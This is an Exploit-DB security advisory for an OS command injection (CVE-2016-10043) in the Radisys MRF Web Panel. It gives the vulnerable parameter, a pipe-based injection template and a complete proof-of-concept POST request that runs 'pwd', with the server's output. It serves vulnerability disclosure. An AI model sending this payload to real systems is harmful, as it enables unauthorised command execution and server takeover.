Radisys MRF - Command Injection

EDB-ID:

41179




Platform:

CGI

Date:

2017-01-27


Title:      MRF Web Panel OS Command Injection
Vendor:     Radisys
Vendor Homepage: http://www.radisys.com
Product:    MRF Web Panel (SWMS)
Version:    9.0.1
CVE:        CVE-2016-10043
CWE:        CWE-78
Risk Level: High

Discovery:  Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos
            COSMOTE (OTE Group) Information & Network Security

-----------------------------------------------------------------------------------------


Vulnerability Details:

The MRF Web Panel (SWMS) is vulnerable to OS Command Injection
attacks.

> Affected parameter: MSM_MACRO_NAME (POST parameter)
> Affected file: ms.cgi (/swms/ms.cgi)
> Verified Affected Operation: Show Fatal Error and Log Package Configuration

It is possible to use the pipe character (|) to inject arbitrary OS commands
and retrieve the output in the application's responses:

MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #


Proof Of Concept:

1. Login to the vulnerable MRF web panel (with a standard user account): 
   https://<vulnerable>/swms
2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc)
3. Modify and send the following POST request:

POST /swms/ms.cgi HTTP/1.1
Host: <vulnerable>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<vulnerable>/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute

4. Check the output of the injected command 'pwd' in the response:

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2016 08:18:43 GMT
Server: Apache
Cache-Control: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23

/var/opt/swms/www/html


Vulnerability Impact:

Application's own data and functionality or the web server can be compromised due
to OS command injection vulnerabilities. It may also be possible to use the server
as a platform for attacks against other systems.


Disclaimer:

The responsible disclosure policy has been followed